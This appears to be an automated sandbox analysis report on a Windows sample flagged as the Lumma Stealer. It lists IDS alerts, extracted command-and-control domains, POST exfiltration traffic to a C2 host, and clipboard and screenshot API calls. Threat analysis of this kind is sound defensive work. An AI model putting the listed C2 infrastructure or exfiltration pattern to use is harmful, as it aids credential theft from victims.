Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop

Source: Joe Sandbox View

IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6CP9VWM5QP1IM68YURUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PL5DDJ64YC5FJAOGWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R4D3TTVIKNLEDKWYQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20231Host: skidjazzyric.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: skidjazzyric.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click

Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440924101.000000000076D000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/
Source: uU6IvUPN39.exe, 00000000.00000003.1452952071.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452838783.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452979206.0000000002F1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/&_
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/E
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/X
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/api
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/apij;
Source: uU6IvUPN39.exe, 00000000.00000003.1481330230.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click:443/apiicrosoft
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: uU6IvUPN39.exe, 00000000.00000003.1468956506.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

0_2_00436980

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043B870	0_2_0043B870
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00408880	0_2_00408880
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00421E70	0_2_00421E70
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00415720	0_2_00415720
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040CFEC	0_2_0040CFEC
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00419840	0_2_00419840
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00406850	0_2_00406850
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00427860	0_2_00427860
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00427070	0_2_00427070
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00406000	0_2_00406000
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043080E	0_2_0043080E
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043F820	0_2_0043F820
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041D0C0	0_2_0041D0C0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004418A0	0_2_004418A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041194F	0_2_0041194F
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043F150	0_2_0043F150
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042B170	0_2_0042B170
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00403900	0_2_00403900
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00425100	0_2_00425100
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00439923	0_2_00439923
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00427133	0_2_00427133
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00433930	0_2_00433930
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004121DB	0_2_004121DB
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042A9F7	0_2_0042A9F7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040E9B0	0_2_0040E9B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041825B	0_2_0041825B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042EA62	0_2_0042EA62
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040CA62	0_2_0040CA62
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00442A60	0_2_00442A60
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041DAD0	0_2_0041DAD0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00429ADE	0_2_00429ADE
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00425AF0	0_2_00425AF0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004092A0	0_2_004092A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00405AB0	0_2_00405AB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040B2B0	0_2_0040B2B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004042B0	0_2_004042B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043CB40	0_2_0043CB40
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042EB5F	0_2_0042EB5F
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00408360	0_2_00408360
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00428B67	0_2_00428B67
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00437B69	0_2_00437B69
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00402B20	0_2_00402B20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00441B20	0_2_00441B20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00432B24	0_2_00432B24
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004063C0	0_2_004063C0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042DBF0	0_2_0042DBF0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00422380	0_2_00422380
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041BBA0	0_2_0041BBA0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042BBA0	0_2_0042BBA0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042EBA1	0_2_0042EBA1
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042EBB3	0_2_0042EBB3
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00441BB0	0_2_00441BB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00441C40	0_2_00441C40
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00442470	0_2_00442470
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00426C76	0_2_00426C76
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041D400	0_2_0041D400
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041C400	0_2_0041C400
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00417405	0_2_00417405
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00414C20	0_2_00414C20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00432426	0_2_00432426
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00428437	0_2_00428437
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043443D	0_2_0043443D
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004354C4	0_2_004354C4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00434CEF	0_2_00434CEF
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043A4EF	0_2_0043A4EF
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004374AB	0_2_004374AB
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041DCB0	0_2_0041DCB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043ACB0	0_2_0043ACB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0042FCBC	0_2_0042FCBC
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040D545	0_2_0040D545
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00425D6A	0_2_00425D6A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00435D13	0_2_00435D13
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00442D20	0_2_00442D20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043CD27	0_2_0043CD27
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00420D90	0_2_00420D90
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0043C5A0	0_2_0043C5A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00436610	0_2_00436610
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00407620	0_2_00407620
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040AE30	0_2_0040AE30
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041F6D0	0_2_0041F6D0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00416ED0	0_2_00416ED0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041BEE1	0_2_0041BEE1
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00402EF0	0_2_00402EF0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004186FC	0_2_004186FC
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00423EFF	0_2_00423EFF
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00431E8E	0_2_00431E8E
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041A690	0_2_0041A690
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0041AF24	0_2_0041AF24
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00427F30	0_2_00427F30
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0040DFE2	0_2_0040DFE2
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004257E0	0_2_004257E0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00429FE4	0_2_00429FE4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00409790	0_2_00409790
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_004427B0	0_2_004427B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00441FB0	0_2_00441FB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213D253	0_2_0213D253
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213E249	0_2_0213E249
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02136267	0_2_02136267
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215A305	0_2_0215A305
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214D327	0_2_0214D327
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216F3B7	0_2_0216F3B7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021573B2	0_2_021573B2
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02172017	0_2_02172017
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213B097	0_2_0213B097
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021560B7	0_2_021560B7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021520D7	0_2_021520D7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021620F5	0_2_021620F5
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02133157	0_2_02133157
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214C148	0_2_0214C148
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02154166	0_2_02154166
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02158197	0_2_02158197
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214B18B	0_2_0214B18B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02136627	0_2_02136627
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214D667	0_2_0214D667
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214C667	0_2_0214C667
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216268D	0_2_0216268D
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021646A4	0_2_021646A4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021726D7	0_2_021726D7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02167712	0_2_02167712
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216572B	0_2_0216572B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216A756	0_2_0216A756
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213D7AC	0_2_0213D7AC
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02142442	0_2_02142442
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021484C2	0_2_021484C2
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02134517	0_2_02134517
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02139507	0_2_02139507
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021385C7	0_2_021385C7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021525E7	0_2_021525E7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02172A17	0_2_02172A17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02160A75	0_2_02160A75
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216FA87	0_2_0216FA87
